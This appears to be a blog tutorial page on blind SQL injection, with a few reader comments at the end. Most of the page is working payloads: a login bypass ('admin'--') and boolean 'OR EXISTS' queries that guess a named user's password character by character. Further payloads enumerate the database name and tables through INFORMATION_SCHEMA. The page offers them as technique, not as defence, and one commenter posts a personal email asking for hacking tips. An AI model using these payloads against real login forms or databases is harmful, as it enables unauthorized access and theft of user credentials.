admin'--'
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
' OR (SELECT COUNT(*) FROM users)>10 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='
In the previous examples we cheated a little. You knew that the table containing user names and passwords was called users and you knew that it had two columns, name and password. In some cases you do not know the name of the table or the column names, but you can use the same techniques to find these out.
You need to find out the name of the database that you are using. The function DATABASE() will give you that value (but you have to guess at it as before). When you know the name of the database being used you can take guesses at the names of the tables.
Does the current database contain the letter j?
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
Is there a table called one in database test?
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
Is there more than one table in the database(s) containing a j?
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
hackindia plz send some tips on ethical hacking...im a newbie beginner
ReplyDeleteemail id : slayerpuppet@gmail.com
Hi !
ReplyDeleteWhere to type those codes ?
really good
ReplyDelete